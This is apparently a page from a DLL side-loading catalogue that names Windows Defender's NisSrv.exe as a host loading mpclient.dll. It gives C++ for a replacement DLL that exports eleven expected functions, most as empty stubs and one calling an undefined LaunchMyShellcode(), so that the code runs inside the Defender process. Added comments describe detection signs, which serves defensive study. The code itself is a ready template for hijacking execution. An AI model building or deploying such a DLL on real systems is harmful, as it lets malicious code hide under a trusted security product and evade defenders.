
## Target

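- `%ProgramFiles%\Windows Defender\NisSrv.exe` loads `mpclient.dll` by name, which makes it a DLL side-loading host (MITRE ATT&CK T1574, Hijack Execution Flow). For detection, treat an `mpclient.dll` image load by `NisSrv.exe` as suspicious when either file sits outside the genuine Defender installation/platform directories or the DLL is not Microsoft-signed.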

## Exports

```cpp
    
// Linker directives that build the export table of the replacement DLL.
// Each "/EXPORT:Name=my_Name" publishes the export `Name` and backs it with the
// local function `my_Name` defined in the extern "C" block below, so the
// loading process resolves every listed name by import and the load succeeds.
// NOTE(review): presumably these eleven names are the mpclient.dll imports of
// NisSrv.exe; confirm against the binary's import table.
// Defender view: a DLL named mpclient.dll that exports only this short list,
// rather than the export set of the vendor library, is a side-loading indicator
// worth checking alongside its signature and load path.
#pragma comment (linker, "/EXPORT:MpConfigClose=my_MpConfigClose")
#pragma comment (linker, "/EXPORT:MpConfigGetValueAlloc=my_MpConfigGetValueAlloc")
#pragma comment (linker, "/EXPORT:MpHandleClose=my_MpHandleClose")
#pragma comment (linker, "/EXPORT:MpNotificationRegister=my_MpNotificationRegister")
#pragma comment (linker, "/EXPORT:MpManagerOpen=my_MpManagerOpen")
#pragma comment (linker, "/EXPORT:MpFreeMemory=my_MpFreeMemory")
#pragma comment (linker, "/EXPORT:MpConfigUninitialize=my_MpConfigUninitialize")
#pragma comment (linker, "/EXPORT:MpConfigOpen=my_MpConfigOpen")
#pragma comment (linker, "/EXPORT:MpConfigInitialize=my_MpConfigInitialize")
#pragma comment (linker, "/EXPORT:MpClientUtilExportFunctions=my_MpClientUtilExportFunctions")
#pragma comment (linker, "/EXPORT:MpUtilsExportFunctions=my_MpUtilsExportFunctions")

// Stub implementations behind the /EXPORT directives above.
// extern "C" gives the functions C linkage, so their symbol names are not
// C++-mangled and can be referenced as my_* by those linker directives.
// Every stub takes no arguments and returns nothing; none of them forwards to
// a genuine library, so ten of the eleven exports are no-ops in this listing.
// NOTE(review): the signatures of the genuine exports are not shown on this
// page; do not read these declarations as the real prototypes.
extern "C" {
    // No-op placeholder for the MpConfigClose export.
    void CALLBACK my_MpConfigClose()
    {
    }

    // No-op placeholder for the MpConfigGetValueAlloc export.
    void CALLBACK my_MpConfigGetValueAlloc()
    {
    }

    // No-op placeholder for the MpHandleClose export.
    void CALLBACK my_MpHandleClose()
    {
    }

    // No-op placeholder for the MpNotificationRegister export.
    void CALLBACK my_MpNotificationRegister()
    {
    }

    // No-op placeholder for the MpManagerOpen export.
    void CALLBACK my_MpManagerOpen()
    {
    }

    // No-op placeholder for the MpFreeMemory export.
    void CALLBACK my_MpFreeMemory()
    {
    }

    // No-op placeholder for the MpConfigUninitialize export.
    void CALLBACK my_MpConfigUninitialize()
    {
    }

    // No-op placeholder for the MpConfigOpen export.
    void CALLBACK my_MpConfigOpen()
    {
    }

    // No-op placeholder for the MpConfigInitialize export.
    void CALLBACK my_MpConfigInitialize()
    {
    }

    // No-op placeholder for the MpClientUtilExportFunctions export.
    void CALLBACK my_MpClientUtilExportFunctions()
    {
    }

    // The only stub with a body: it calls LaunchMyShellcode(), which is not
    // defined in this listing. Whatever that routine does runs inside the
    // process that loaded this DLL whenever that process calls the
    // MpUtilsExportFunctions export, i.e. under the host binary's identity.
    // Detection note: activity attributed to NisSrv.exe that does not fit the
    // service (new executable memory regions, child processes, unexpected
    // outbound connections) after an mpclient.dll load deserves triage.
    void CALLBACK my_MpUtilsExportFunctions()
    { 
        LaunchMyShellcode();
    }

}
```

## Source

- [Sh0ck / @Sh0ckFR](https://twitter.com/Sh0ckFR/status/1554021948967079936)
- [my gist](https://gist.github.com/mgeeky/d8229940c45c27c1faba14fab55ca7ee)